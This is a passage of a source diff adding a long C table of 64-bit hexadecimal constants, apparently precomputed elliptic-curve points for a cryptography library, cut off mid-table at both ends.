UINT64_C(0x53FDC5CDAE751533) }, ++ { UINT64_C(0x6F3BD329C3EEA63A), UINT64_C(0xA7A22091E53DD29E), ++ UINT64_C(0xB7164F73DC4C54EC), UINT64_C(0xCA66290D44D3D74E), ++ UINT64_C(0xF77C62424C9EA511), UINT64_C(0x34337F551F714C49) } }, ++ { { UINT64_C(0x5ED2B216A64B6C4B), UINT64_C(0x1C38794F3AAE640D), ++ UINT64_C(0x30BBAEE08905794F), UINT64_C(0x0D9EE41EC8699CFB), ++ UINT64_C(0xAF38DAF2CF7B7C29), UINT64_C(0x0D6A05CA43E53513) }, ++ { UINT64_C(0xBE96C6442606AB56), UINT64_C(0x13E7A072E9EB9734), ++ UINT64_C(0xF96694455FF50CD7), UINT64_C(0x68EF26B547DA6F1D), ++ UINT64_C(0xF002873823687CB7), UINT64_C(0x5ED9C8766217C1CE) } }, ++ { { UINT64_C(0x423BA5130A3A9691), UINT64_C(0xF421B1E7B3179296), ++ UINT64_C(0x6B51BCDB1A871E1B), UINT64_C(0x6E3BB5B5464E4300), ++ UINT64_C(0x24171E2EFC6C54CC), UINT64_C(0xA9DFA947D3E58DC2) }, ++ { UINT64_C(0x175B33099DE9CFA7), UINT64_C(0x707B25292D1015DA), ++ UINT64_C(0xCBB95F17993EA65A), UINT64_C(0x935150630447450D), ++ UINT64_C(0x0F47B2051B2753C9), UINT64_C(0x4A0BAB14E7D427CF) } }, ++ { { UINT64_C(0xA39DEF39B5AA7CA1), UINT64_C(0x591CB173C47C33DF), ++ UINT64_C(0xA09DAC796BBAB872), UINT64_C(0x3EF9D7CF7208BA2F), ++ UINT64_C(0x3CC189317A0A34FC), UINT64_C(0xAE31C62BBCC3380F) }, ++ { UINT64_C(0xD72A67940287C0B4), UINT64_C(0x3373382C68E334F1), ++ UINT64_C(0xD0310CA8BD20C6A6), UINT64_C(0xA2734B8742C033FD), ++ UINT64_C(0xA5D390F18DCE4509), UINT64_C(0xFC84E74B3E1AFCB5) } }, ++ { { UINT64_C(0xB028334DF2CD8A9C), UINT64_C(0xB8719291570F76F6), ++ UINT64_C(0x662A386E01065A2D), UINT64_C(0xDF1634CB53D940AE), ++ UINT64_C(0x625A7B838F5B41F9), UINT64_C(0xA033E4FEEE6AA1B4) }, ++ { UINT64_C(0x51E9D4631E42BABB), UINT64_C(0x660BC2E40D388468), ++ UINT64_C(0x3F702189FCBB114A), UINT64_C(0x6B46FE35B414CA78), ++ UINT64_C(0x328F6CF24A57316B), UINT64_C(0x917423B5381AD156) } }, ++ { { UINT64_C(0xAC19306E5373A607), UINT64_C(0x471DF8E3191D0969), ++ UINT64_C(0x380ADE35B9720D83), UINT64_C(0x7423FDF548F1FD5C), ++ UINT64_C(0x8B090C9F49CABC95), UINT64_C(0xB768E8CDC9842F2F) }, ++ { UINT64_C(0x399F456DE56162D6), UINT64_C(0xBB6BA2404F326791), ++ UINT64_C(0x8F4FBA3B342590BE), UINT64_C(0x053986B93DFB6B3E), ++ UINT64_C(0xBB6739F1190C7425), UINT64_C(0x32D4A55332F7E95F) } }, ++ { { UINT64_C(0x0205A0EC0DDBFB21), UINT64_C(0x3010327D33AC3407), ++ UINT64_C(0xCF2F4DB33348999B), UINT64_C(0x660DB9F41551604A), ++ UINT64_C(0xC346C69A5D38D335), UINT64_C(0x64AAB3D338882479) }, ++ { UINT64_C(0xA096B5E76AE44403), UINT64_C(0x6B4C9571645F76CD), ++ UINT64_C(0x72E1CD5F4711120F), UINT64_C(0x93EC42ACF27CC3E1), ++ UINT64_C(0x2D18D004A72ABB12), UINT64_C(0x232E9568C9841A04) } }, ++ { { UINT64_C(0xFF01DB223CC7F908), UINT64_C(0x9F214F8FD13CDD3B), ++ UINT64_C(0x38DADBB7E0B014B5), UINT64_C(0x2C548CCC94245C95), ++ UINT64_C(0x714BE331809AFCE3), UINT64_C(0xBCC644109BFE957E) }, ++ { UINT64_C(0xC21C2D215B957F80), UINT64_C(0xBA2D4FDCBB8A4C42), ++ UINT64_C(0xFA6CD4AF74817CEC), UINT64_C(0x9E7FB523C528EAD6), ++ UINT64_C(0xAED781FF7714B10E), UINT64_C(0xB52BB59294F04455) } }, ++ { { UINT64_C(0xA578BD69868CC68B), UINT64_C(0xA40FDC8D603F2C08), ++ UINT64_C(0x53D79BD12D81B042), UINT64_C(0x1B136AF3A7587EAB), ++ UINT64_C(0x1ED4F939868A16DB), UINT64_C(0x775A61FBD0B98273) }, ++ { UINT64_C(0xBA5C12A6E56BEF8C), UINT64_C(0xF926CE52DDDC8595), ++ UINT64_C(0xA13F5C8F586FE1F8), UINT64_C(0xEAC9F7F2060DBB54), ++ UINT64_C(0x70C0AC3A51AF4342), UINT64_C(0xC16E303C79CDA450) } }, ++ { { UINT64_C(0xD0DADD6C8113F4EA), UINT64_C(0xF14E392207BDF09F), ++ UINT64_C(0x3FE5E9C2AA7D877C), UINT64_C(0x9EA95C1948779264), ++ UINT64_C(0xE93F65A74FCB8344), UINT64_C(0x9F40837E76D925A4) }, ++ { UINT64_C(0x0EA6DA3F8271FFC7), UINT64_C(0x557FA529CC8F9B19), ++ UINT64_C(0x2613DBF178E6DDFD), UINT64_C(0x7A7523B836B1E954), ++ UINT64_C(0x20EB3168406A87FB), UINT64_C(0x64C21C1403ABA56A) } }, ++ { { UINT64_C(0xE86C9C2DC032DD5F), UINT64_C(0x158CEB8E86F16A21), ++ UINT64_C(0x0279FF5368326AF1), UINT64_C(0x1FFE2E2B59F12BA5), ++ UINT64_C(0xD75A46DB86826D45), UINT64_C(0xE19B48411E33E6AC) }, ++ { UINT64_C(0x5F0CC5240E52991C), UINT64_C(0x645871F98B116286), ++ UINT64_C(0xAB3B4B1EFCAEC5D3), UINT64_C(0x994C8DF051D0F698), ++ UINT64_C(0x06F890AFE5D13040), UINT64_C(0x72D9DC235F96C7C2) } }, ++ { { UINT64_C(0x7C018DEEE7886A80), UINT64_C(0xFA2093308786E4A3), ++ UINT64_C(0xCEC8E2A3A4415CA1), UINT64_C(0x5C736FC1CC83CC60), ++ UINT64_C(0xFEF9788CF00C259F), UINT64_C(0xED5C01CBDD29A6AD) }, ++ { UINT64_C(0x87834A033E20825B), UINT64_C(0x13B1239D123F9358), ++ UINT64_C(0x7E8869D0FBC286C1), UINT64_C(0xC4AB5AA324CE8609), ++ UINT64_C(0x38716BEEB6349208), UINT64_C(0x0BDF4F99B322AE21) } }, ++ { { UINT64_C(0x6B97A2BF53E3494B), UINT64_C(0xA8AA05C570F7A13E), ++ UINT64_C(0x209709C2F1305B51), UINT64_C(0x57B31888DAB76F2C), ++ UINT64_C(0x75B2ECD7AA2A406A), UINT64_C(0x88801A00A35374A4) }, ++ { UINT64_C(0xE1458D1C45C0471B), UINT64_C(0x5760E306322C1AB0), ++ UINT64_C(0x789A0AF1AD6AB0A6), UINT64_C(0x74398DE1F458B9CE), ++ UINT64_C(0x1652FF9F32E0C65F), UINT64_C(0xFAF1F9D5FFFB3A52) } }, ++ }, ++ { ++ { { UINT64_C(0xA05C751CD1D1B007), UINT64_C(0x016C213B0213E478), ++ UINT64_C(0x9C56E26CF4C98FEE), UINT64_C(0x6084F8B9E7B3A7C7), ++ UINT64_C(0xA0B042F6DECC1646), UINT64_C(0x4A6F3C1AFBF3A0BC) }, ++ { UINT64_C(0x94524C2C51C9F909), UINT64_C(0xF3B3AD403A6D3748), ++ UINT64_C(0x18792D6E7CE1F9F5), UINT64_C(0x8EBC2FD7FC0C34FA), ++ UINT64_C(0x032A9F41780A1693), UINT64_C(0x34F9801E56A60019) } }, ++ { { UINT64_C(0xB398290CF0DB3751), UINT64_C(0x01170580BA42C976), ++ UINT64_C(0x3E71AA2956560B89), UINT64_C(0x80817AAC50E6647B), ++ UINT64_C(0x35C833ADA0BE42DA), UINT64_C(0xFA3C6148F1BABA4E) }, ++ { UINT64_C(0xC57BE645CD8F6253), UINT64_C(0x77CEE46BC657AD0D), ++ UINT64_C(0x830077310DEFD908), UINT64_C(0x92FE9BCE899CBA56), ++ UINT64_C(0x48450EC4BCEFFB5A), UINT64_C(0xE615148DF2F5F4BF) } }, ++ { { UINT64_C(0xF55EDABB90B86166), UINT64_C(0x27F7D784075430A2), ++ UINT64_C(0xF53E822B9BF17161), UINT64_C(0x4A5B3B93AFE808DC), ++ UINT64_C(0x590BBBDED7272F55), UINT64_C(0x233D63FAEAEA79A1) }, ++ { UINT64_C(0xD7042BEAFE1EBA07), UINT64_C(0xD2B9AEA010750D7E), ++ UINT64_C(0xD8D1E69031078AA5), UINT64_C(0x9E837F187E37BC8B), ++ UINT64_C(0x9558FF4F85008975), UINT64_C(0x93EDB837421FE867) } }, ++ { { UINT64_C(0xAA6489DF83D55B5A), UINT64_C(0xEA092E4986BF27F7), ++ UINT64_C(0x4D8943A95FA2EFEC), UINT64_C(0xC9BAAE53720E1A8C), ++ UINT64_C(0xC055444B95A4F8A3), UINT64_C(0x93BD01E8A7C1206B) }, ++ { UINT64_C(0xD97765B6714A27DF), UINT64_C(0xD622D954193F1B16), ++ UINT64_C(0x115CC35AF1503B15), UINT64_C(0x1DD5359FA9FA21F8), ++ UINT64_C(0x197C32996DFED1F1), UINT64_C(0xDEE8B7C9F77F2679) } }, ++ { { UINT64_C(0x5405179F394FD855), UINT64_C(0xC9D6E24449FDFB33), ++ UINT64_C(0x70EBCAB4BD903393), UINT64_C(0x0D3A3899A2C56780), ++ UINT64_C(0x012C7256683D1A0A), UINT64_C(0xC688FC8880A48F3B) }, ++ { UINT64_C(0x180957546F7DF527), UINT64_C(0x9E339B4B71315D16), ++ UINT64_C(0x90560C28A956BB12), UINT64_C(0x2BECEA60D42EEE8D), ++ UINT64_C(0x82AEB9A750632653), UINT64_C(0xED34353EDFA5CD6A) } }, ++ { { UINT64_C(0x82154D2C91AECCE4), UINT64_C(0x312C60705041887F), ++ UINT64_C(0xECF589F3FB9FBD71), UINT64_C(0x67660A7DB524BDE4), ++ UINT64_C(0xE99B029D724ACF23), UINT64_C(0xDF06E4AF6D1CD891) }, ++ { UINT64_C(0x07806CB580EE304D), UINT64_C(0x0C70BB9F7443A8F8), ++ UINT64_C(0x01EC341408B0830A), UINT64_C(0xFD7B63C35A81510B), ++ UINT64_C(0xE90A0A39453B5F93), UINT64_C(0xAB700F8F9BC71725) } }, ++ { { UINT64_C(0x9401AEC2B9F00793), UINT64_C(0x064EC4F4B997F0BF), ++ UINT64_C(0xDC0CC1FD849240C8), UINT64_C(0x39A75F37B6E92D72), ++ UINT64_C(0xAA43CA5D0224A4AB), UINT64_C(0x9C4D632554614C47) }, ++ { UINT64_C(0x1767366FC6709DA3), UINT64_C(0xA6B482D123479232), ++ UINT64_C(0x54DC6DDC84D63E85), UINT64_C(0x0ACCB5ADC99D3B9E), ++ UINT64_C(0x211716BBE8AA3ABF), UINT64_C(0xD0FE25AD69EC6406) } }, ++ { { UINT64_C(0x0D5C1769DF85C705), UINT64_C(0x7086C93DA409DCD1), ++ UINT64_C(0x9710839D0E8D75D8), UINT64_C(0x17B7DB75EBDD4177), ++ UINT64_C(0xAF69EB58F649A809), UINT64_C(0x6EF19EA28A84E220) }, ++ { UINT64_C(0x36EB5C6665C278B2), UINT64_C(0xD2A1512881EA9D65), ++ UINT64_C(0x4FCBA840769300AD), UINT64_C(0xC2052CCDC8E536E5), ++ UINT64_C(0x9CAEE014AC263B8F), UINT64_C(0x56F7ED7AF9239663) } }, ++ { { UINT64_C(0xF6FA251FAC9E09E1), UINT64_C(0xA3775605955A2853), ++ UINT64_C(0x977B8D21F2A4BD78), UINT64_C(0xF68AA7FF3E096410), ++ UINT64_C(0x01AB055265F88419), UINT64_C(0xC4C8D77EBB93F64E) }, ++ { UINT64_C(0x718251113451FE64), UINT64_C(0xFA0F905B46F9BAF0), ++ UINT64_C(0x79BE3BF3CA49EF1A), UINT64_C(0x831109B26CB02071), ++ UINT64_C(0x765F935FC4DDBFE5), UINT64_C(0x6F99CD1480E5A3BA) } }, ++ { { UINT64_C(0xD2E8DA04234F91FF), UINT64_C(0x4DED4D6D813867AA), ++ UINT64_C(0x3B50175DE0A0D945), UINT64_C(0x55AC74064EB78137), ++ UINT64_C(0xE9FA7F6EE1D47730), UINT64_C(0x2C1715315CBF2176) }, ++ { UINT64_C(0xA521788F2BE7A47D), UINT64_C(0x95B15A273FCF1AB3), ++ UINT64_C(0xAADA6401F28A946A), UINT64_C(0x628B2EF48B4E898B), ++ UINT64_C(0x0E6F46296D6592CC), UINT64_C(0x997C7094A723CADD) } }, ++ { { UINT64_C(0x878BCE116AFE80C6), UINT64_C(0xA89ABC9D007BBA38), ++ UINT64_C(0xB0C1F87BA7CC267F), UINT64_C(0x86D33B9D5104FF04), ++ UINT64_C(0xB0504B1B2EF1BA42), UINT64_C(0x21693048B2827E88) }, ++ { UINT64_C(0x11F1CCD579CFCD14), UINT64_C(0x59C09FFA94AD227E), ++ UINT64_C(0x95A4ADCB3EA91ACF), UINT64_C(0x1346238BB4370BAA), ++ UINT64_C(0xB099D2023E1367B0), UINT64_C(0xCF5BBDE690F23CEA) } }, ++ { { UINT64_C(0x453299BBBCB3BE5E), UINT64_C(0x123C588E38E9FF97), ++ UINT64_C(0x8C115DD9F6A2E521), UINT64_C(0x6E333C11FF7D4B98), ++ UINT64_C(0x9DD061E5DA73E736), UINT64_C(0xC6AB7B3A5CA53056) }, ++ { UINT64_C(0xF1EF3EE35B30A76B), UINT64_C(0xADD6B44A961BA11F), ++ UINT64_C(0x7BB00B752CA6E030), UINT64_C(0x270272E82FE270AD), ++ UINT64_C(0x23BC6F4F241A9239), UINT64_C(0x88581E130BB94A94) } }, ++ { { UINT64_C(0xBD225A6924EEF67F), UINT64_C(0x7CFD96140412CEB7), ++ UINT64_C(0xF6DE167999AC298E), UINT64_C(0xB20FD895ED6C3571), ++ UINT64_C(0x03C73B7861836C56), UINT64_C(0xEE3C3A16ABA6CB34) }, ++ { UINT64_C(0x9E8C56674138408A), UINT64_C(0xEC25FCB12DD6EBDF), ++ UINT64_C(0xC54C33FDDBBDF6E3), UINT64_C(0x93E0913B4A3C9DD4), ++ UINT64_C(0x66D7D13535EDEED4), UINT64_C(0xD29A36C4453FB66E) } }, ++ { { UINT64_C(0x7F192F039F1943AF), UINT64_C(0x6488163F4E0B5FB0), ++ UINT64_C(0x66A45C6953599226), UINT64_C(0x924E2E439AD15A73), ++ UINT64_C(0x8B553DB742A99D76), UINT64_C(0x4BC6B53B0451F521) }, ++ { UINT64_C(0xC029B5EF101F8AD6), UINT64_C(0x6A4DA71CC507EED9), ++ UINT64_C(0x3ADFAEC030BB22F3), UINT64_C(0x81BCAF7AB514F85B), ++ UINT64_C(0x2E1E6EFF5A7E60D3), UINT64_C(0x5270ABC0AE39D42F) } }, ++ { { UINT64_C(0x86D56DEB3901F0F8), UINT64_C(0x1D0BC792EED5F650), ++ UINT64_C(0x1A2DDFD8CA1114A3), UINT64_C(0x94ABF4B1F1DD316D), ++ UINT64_C(0xF72179E43D9F18EF), UINT64_C(0x52A0921E9AA2CABF) }, ++ { UINT64_C(0xECDA9E27A7452883), UINT64_C(0x7E90850AAFD771B4), ++ UINT64_C(0xD40F87EA9CC0465C), UINT64_C(0x8CFCB60A865CDA36), ++ UINT64_C(0x3DBEC2CC7C650942), UINT64_C(0x071A4EE7E718CA9D) } }, ++ { { UINT64_C(0x73C0E4FF276AC5F3), UINT64_C(0xE7BA5A6ABDB97EA1), ++ UINT64_C(0x638CA54EC5808398), UINT64_C(0x8258DC82413855E5), ++ UINT64_C(0x35DDD2E957F07614), UINT64_C(0xF98DD6921DC13BF9) }, ++ { UINT64_C(0x3A4C0088F16DCD84), UINT64_C(0xF192EADD833D83F9), ++ UINT64_C(0x3C26C931A6D61D29), UINT64_C(0x589FDD52DE0AD7A1), ++ UINT64_C(0x7CD83DD20442D37F), UINT64_C(0x1E47E777403ECBFC) } }, ++ }, ++ { ++ { { UINT64_C(0x2AF8ED8170D4D7BC), UINT64_C(0xABC3E15FB632435C), ++ UINT64_C(0x4C0E726F78219356), UINT64_C(0x8C1962A1B87254C4), ++ UINT64_C(0x30796A71C9E7691A), UINT64_C(0xD453EF19A75A12EE) }, ++ { UINT64_C(0x535F42C213AE4964), UINT64_C(0x86831C3C0DA9586A), ++ UINT64_C(0xB7F1EF35E39A7A58), UINT64_C(0xA2789AE2D459B91A), ++ UINT64_C(0xEADBCA7F02FD429D), UINT64_C(0x94F215D465290F57) } }, ++ { { UINT64_C(0x37ED2BE51CFB79AC), UINT64_C(0x801946F3E7AF84C3), ++ UINT64_C(0xB061AD8AE77C2F00), UINT64_C(0xE87E1A9A44DE16A8), ++ UINT64_C(0xDF4F57C87EE490FF), UINT64_C(0x4E793B49005993ED) }, ++ { UINT64_C(0xE1036387BCCB593F), UINT64_C(0xF174941195E09B80), ++ UINT64_C(0x59CB20D15AB42F91), UINT64_C(0xA738A18DAC0FF033), ++ UINT64_C(0xDA501A2E2AC1E7F4), UINT64_C(0x1B67EDA084D8A6E0) } }, ++ { { UINT64_C(0x1D27EFCE1080E90B), UINT64_C(0xA28152463FD01DC6), ++ UINT64_C(0x99A3FB83CAA26D18), UINT64_C(0xD27E6133B82BABBE), ++ UINT64_C(0x61030DFDD783DD60), UINT64_C(0x295A291373C78CB8) }, ++ { UINT64_C(0x8707A2CF68BE6A92), UINT64_C(0xC9C2FB98EEB3474A), ++ UINT64_C(0x7C3FD412A2B176B8), UINT64_C(0xD5B52E2FC7202101), ++ UINT64_C(0x24A63030F0A6D536), UINT64_C(0x05842DE304648EC0) } }, ++ { { UINT64_C(0x67477CDC30577AC9), UINT64_C(0x51DD9775244F92A8), ++ UINT64_C(0x31FD60B9917EEC66), UINT64_C(0xACD95BD4D66C5C1D), ++ UINT64_C(0x2E0551F3BF9508BA), UINT64_C(0x121168E1688CB243) }, ++ { UINT64_C(0x8C0397404540D230), UINT64_C(0xC4ED3CF6009ECDF9), ++ UINT64_C(0x191825E144DB62AF), UINT64_C(0x3EE8ACABC4A030DA), ++ UINT64_C(0x8AB154A894081504), UINT64_C(0x1FE09E4B486C9CD0) } }, ++ { { UINT64_C(0x512F82F9D113450B), UINT64_C(0x5878C9012DBC9197), ++ UINT64_C(0xDB87412BE13F355B), UINT64_C(0x0A0A4A9B935B8A5E), ++ UINT64_C(0x818587BDF25A5351), UINT64_C(0xE807931031E3D9C7) }, ++ { UINT64_C(0x8B1D47C7611BC1B1), UINT64_C(0x51722B5872A823F2), ++ UINT64_C(0x6F97EE8A53B36B3E), UINT64_C(0x6E085AAC946DD453), ++ UINT64_C(0x2EC5057DE65E6533), UINT64_C(0xF82D9D714BB18801) } }, ++ { { UINT64_C(0xAD81FA938BA5AA8E), UINT64_C(0x723E628E8F7AA69E), ++ UINT64_C(0x0BA7C2DEEF35937C), UINT64_C(0x83A43EC56DECFB40), ++ UINT64_C(0xF520F849E60C4F2D), UINT64_C(0x8260E8AE457E3B5E) }, ++ { UINT64_C(0x7CE874F0BF1D9ED7), UINT64_C(0x5FDE35537F1A5466), ++ UINT64_C(0x5A63777C0C162DBB), UINT64_C(0x0FD04F8CDAD87289), ++ UINT64_C(0xCA2D9E0E640761D5), UINT64_C(0x4615CFF838501ADB) } }, ++ { { UINT64_C(0x9422789B110B4A25), UINT64_C(0x5C26779F70AD8CC1), ++ UINT64_C(0x4EE6A748EC4F1E14), UINT64_C(0xFB584A0D5C7AB5E0), ++ UINT64_C(0xED1DCB0BFB21EE66), UINT64_C(0xDBED1F0011C6863C) }, ++ { UINT64_C(0xD2969269B1B1D187), UINT64_C(0xF7D0C3F2AFE964E6), ++ UINT64_C(0xE05EE93F12BB865E), UINT64_C(0x1AFB7BEEED79118E), ++ UINT64_C(0x220AF1380F0FE453), UINT64_C(0x1463AA1A52782AB9) } }, ++ { { UINT64_C(0x7C139D56D7DBE5F9), UINT64_C(0xFC16E6110B83685B), ++ UINT64_C(0xFA723C029018463C), UINT64_C(0xC472458C840BF5D7), ++ UINT64_C(0x4D8093590AF07591), UINT64_C(0x418D88303308DFD9) }, ++ { UINT64_C(0x9B381E040C365AE3), UINT64_C(0x3780BF33F8190FD1), ++ UINT64_C(0x45397418DD03E854), UINT64_C(0xA95D030F4E51E491), ++ UINT64_C(0x87C8C686E3286CEA), UINT64_C(0x01C773BF900B5F83) } }, ++ { { UINT64_C(0xDABE347578673B02), UINT64_C(0x4F0F25CEF6E7395E), ++ UINT64_C(0x3117ABB9D181AD45), UINT64_C(0x4B559F88AA13DE0B), ++ UINT64_C(0xFD8EFE78EA7C9745), UINT64_C(0x080600475DD21682) }, ++ { UINT64_C(0xC0F5DE4BD4C86FFC), UINT64_C(0x4BB14B1EF21AB6A2), ++ UINT64_C(0xACB53A6CF50C1D12), UINT64_C(0x46AAC4505CC9162E), ++ UINT64_C(0x049C51E02DE240B6), UINT64_C(0xBB2DC016E383C3B0) } }, ++ { { UINT64_C(0xA3C56AD28E438C92), UINT64_C(0x7C43F98FB2CEAF1A), ++ UINT64_C(0x397C44F7E2150778), UINT64_C(0x48D17AB771A24131), ++ UINT64_C(0xCC5138631E2ACDA9), UINT64_C(0x2C76A55EF0C9BAC9) }, ++ { UINT64_C(0x4D74CDCE7EA4BB7B), UINT64_C(0x834BD5BFB1B3C2BA), ++ UINT64_C(0x46E2911ECCC310A4), UINT64_C(0xD3DE84AA0FC1BF13), ++ UINT64_C(0x27F2892F80A03AD3), UINT64_C(0x85B476203BD2F08B) } }, ++ { { UINT64_C(0xAB1CB818567AF533), UINT64_C(0x273B4537BAC2705A), ++ UINT64_C(0x133066C422C84AB6), UINT64_C(0xC3590DE64830BFC1), ++ UINT64_C(0xEA2978695E4742D0), UINT64_C(0xF6D8C6944F3164C0) }, ++ { UINT64_C(0x09E85F3DC1249588), UINT64_C(0x6C2BB05D4EC64DF7), ++ UINT64_C(0xD267115E8B78000F), UINT64_C(0x07C5D7AEC7E4A316), ++ UINT64_C(0xCB1187BA4619E5BD), UINT64_C(0x57B1D4EFA43F7EEE) } }, ++ { { UINT64_C(0x3618891FC8176A96), UINT64_C(0x62C4B084E5808B97), ++ UINT64_C(0xDE5585464DD95D6E), UINT64_C(0x27A8133E730B2EA4), ++ UINT64_C(0xE07CEEC36AF318A0), UINT64_C(0x0ACC1286CE24FD2C) }, ++ { UINT64_C(0x8A48FE4ADD4D307C), UINT64_C(0x71A9BA9C18CDE0DA), ++ UINT64_C(0x655E2B66D5D79747), UINT64_C(0x409FE856A79AEDC7), ++ UINT64_C(0xC5A9F244D287E5CF), UINT64_C(0xCCE103844E82EC39) } }, ++ { { UINT64_C(0x00675BA7F25D364C), UINT64_C(0x7A7F162968D36BDF), ++ UINT64_C(0x35EC468AA9E23F29), UINT64_C(0xF797AC502D926E6C), ++ UINT64_C(0x639BA4534B4F4376), UINT64_C(0xD71B430F51FF9519) }, ++ { UINT64_C(0xB8C439EC2CF5635C), UINT64_C(0x0CE4C8D181980393), ++ UINT64_C(0x4C5362A964123B15), UINT64_C(0x6E0421E0FFDCF096), ++ UINT64_C(0x624A855F10D1F914), UINT64_C(0x7D8F3AB7614DCD29) } }, ++ { { UINT64_C(0xD9219ADAB3493CE0), UINT64_C(0x971B243A52F09AE5), ++ UINT64_C(0xC16C9BF8E24E3674), UINT64_C(0x026D408DCE68C7CD), ++ UINT64_C(0xF9B33DD9358209E3), UINT64_C(0x02D0595DF3B2A206) }, ++ { UINT64_C(0xBF99427160D15640), UINT64_C(0x6DA7A04E15B5466A), ++ UINT64_C(0x03AA4ED81CADB50D), UINT64_C(0x1548F029129A4253), ++ UINT64_C(0x41741F7EB842865A), UINT64_C(0x859FE0A4A3F88C98) } }, ++ { { UINT64_C(0x80DE085A05FD7553), UINT64_C(0x4A4AB91EB897566B), ++ UINT64_C(0x33BCD4752F1C173F), UINT64_C(0x4E238896C100C013), ++ UINT64_C(0x1C88500DD614B34B), UINT64_C(0x0401C5F6C3BA9E23) }, ++ { UINT64_C(0x8E8003C4D0AF0DE5), UINT64_C(0x19B1DFB59D0DCBB9), ++ UINT64_C(0x4A3640A9EBEF7AB6), UINT64_C(0xEDAFD65B959B15F6), ++ UINT64_C(0x8092EF7F7FB95821), UINT64_C(0xAB8DD52ECE2E45D1) } }, ++ { { UINT64_C(0xD1F2D6B8B9CFE6BF), UINT64_C(0x6358810B00073F6F), ++ UINT64_C(0x5FCE5993D712106E), UINT64_C(0x5EE6B2711C024C91), ++ UINT64_C(0xD0248FF5453DB663), UINT64_C(0xD6D81CB2ADB835E8) }, ++ { UINT64_C(0x8696CFECFDFCB4C7), UINT64_C(0x696B7FCB53BC9045), ++ UINT64_C(0xAB4D3807DDA56981), UINT64_C(0x2F9980521E4B943B), ++ UINT64_C(0x8AA76ADB166B7F18), UINT64_C(0x6393430152A2D7ED) } }, ++ }, ++ { ++ { { UINT64_C(0xBBCCCE39A368EFF6), UINT64_C(0xD8CAABDF8CEB5C43), ++ UINT64_C(0x9EAE35A5D2252FDA), UINT64_C(0xA8F4F20954E7DD49), ++ UINT64_C(0xA56D72A6295100FD), UINT64_C(0x20FC1FE856767727) }, ++ { UINT64_C(0xBF60B2480BBAA5AB), UINT64_C(0xA4F3CE5A313911F2), ++ UINT64_C(0xC2A67AD4B93DAB9C), UINT64_C(0x18CD0ED022D71F39), ++ UINT64_C(0x04380C425F304DB2), UINT64_C(0x26420CBB6729C821) } }, ++ { { UINT64_C(0x26BD07D6BDFBCAE8), UINT64_C(0x10B5173FDF01A80A), ++ UINT64_C(0xD831C5466798B96C), UINT64_C(0x1D6B41081D3F3859), ++ UINT64_C(0x501D38EC991B9EC7), UINT64_C(0x26319283D78431A9) }, ++ { UINT64_C(0x8B85BAF7118B343C), UINT64_C(0x4696CDDD58DEF7D0), ++ UINT64_C(0xEFC7C1107ACDCF58), UINT64_C(0xD9AF415C848D5842), ++ UINT64_C(0x6B5A06BC0AC7FDAC), UINT64_C(0x7D623E0DA344319B) } }, ++ { { UINT64_C(0x4C0D78060C9D3547), UINT64_C(0x993F048DCF2AED47), ++ UINT64_C(0x5217C453E4B57E22), UINT64_C(0xB4669E35F4172B28), ++ UINT64_C(0x509A3CD049F999F8), UINT64_C(0xD19F863287C69D41) }, ++ { UINT64_C(0xE14D01E84C8FDED0), UINT64_C(0x342880FDEAFD9E1C), ++ UINT64_C(0x0E17BFF270DC2BF0), UINT64_C(0x46560B7BC0186400), ++ UINT64_C(0xE28C7B9C49A4DD34), UINT64_C(0x182119160F325D06) } }, ++ { { UINT64_C(0x46D70888D7E02E18), UINT64_C(0x7C806954D9F11FD9), ++ UINT64_C(0xE4948FCA4FBEA271), UINT64_C(0x7D6C7765BD80A9DF), ++ UINT64_C(0x1B470EA6F3871C71), UINT64_C(0xD62DE2448330A570) }, ++ { UINT64_C(0xDAECDDC1C659C3A7), UINT64_C(0x8621E513077F7AFC), ++ UINT64_C(0x56C7CD84CAEEEF13), UINT64_C(0xC60C910FC685A356), ++ UINT64_C(0xE68BC5C59DD93DDC), UINT64_C(0xD904E89FFEB64895) } }, ++ { { UINT64_C(0x75D874FB8BA7917A), UINT64_C(0x18FA7F53FD043BD4), ++ UINT64_C(0x212A0AD71FC3979E), UINT64_C(0x5703A7D95D6EAC0E), ++ UINT64_C(0x222F7188017DEAD5), UINT64_C(0x1EC687B70F6C1817) }, ++ { UINT64_C(0x23412FC3238BACB6), UINT64_C(0xB85D70E954CED154), ++ UINT64_C(0xD4E06722BDA674D0), UINT64_C(0x3EA5F17836F5A0C2), ++ UINT64_C(0x7E7D79CFF5C6D2CA), UINT64_C(0x1FFF94643DBB3C73) } }, ++ { { UINT64_C(0x916E19D0F163E4A8), UINT64_C(0x1E6740E71489DF17), ++ UINT64_C(0x1EAF9723339F3A47), UINT64_C(0x22F0ED1A124B8DAD), ++ UINT64_C(0x39C9166C49C3DD04), UINT64_C(0x628E7FD4CE1E9ACC) }, ++ { UINT64_C(0x124DDF2740031676), UINT64_C(0x002569391EDDB9BE), ++ UINT64_C(0xD39E25E7D360B0DA), UINT64_C(0x6E3015A84AA6C4C9), ++ UINT64_C(0xC6A2F643623EDA09), UINT64_C(0xBEFF2D1250AA99FB) } }, ++ { { UINT64_C(0x1FEEF7CE93EE8089), UINT64_C(0xC6B180BC252DD7BD), ++ UINT64_C(0xA16FB20B1788F051), UINT64_C(0xD86FD392E046ED39), ++ UINT64_C(0xDA0A36119378CE1D), UINT64_C(0x121EF3E7A5F7A61D) }, ++ { UINT64_C(0x94D2206192D13CAE), UINT64_C(0x5076046A77C72E08), ++ UINT64_C(0xF18BC2337D2308B9), UINT64_C(0x004DB3C517F977B1), ++ UINT64_C(0xD05AE3990471C11D), UINT64_C(0x86A2A55785CD1726) } }, ++ { { UINT64_C(0xB8D9B28672107804), UINT64_C(0xB5A7C4133303B79B), ++ UINT64_C(0x927EEF785FA37DED), UINT64_C(0xA1C5CF1EAD67DABA), ++ UINT64_C(0xAA5E3FB27360E7C7), UINT64_C(0x8354E61A0A0C0993) }, ++ { UINT64_C(0x2EC73AF97F5458CC), UINT64_C(0xDE4CB48848474325), ++ UINT64_C(0x2DD134C77209BC69), UINT64_C(0xB70C5567451A2ABE), ++ UINT64_C(0x2CD1B2008E293018), UINT64_C(0x15F8DA7AD33C0D72) } }, ++ { { UINT64_C(0x5DC386D0A8790657), UINT64_C(0xA4FDF676BC4D88BB), ++ UINT64_C(0x1B21F38F48BC6C49), UINT64_C(0xCDCC7FAA543A7003), ++ UINT64_C(0xEA97E7AA8C9CF72C), UINT64_C(0xA6B883F450D938A8) }, ++ { UINT64_C(0x51936F3AA3A10F27), UINT64_C(0x0170785FDECC76BF), ++ UINT64_C(0x7539ECE1908C578A), UINT64_C(0x5D9C8A8E0F3E8C25), ++ UINT64_C(0x8681B43B9E4717A7), 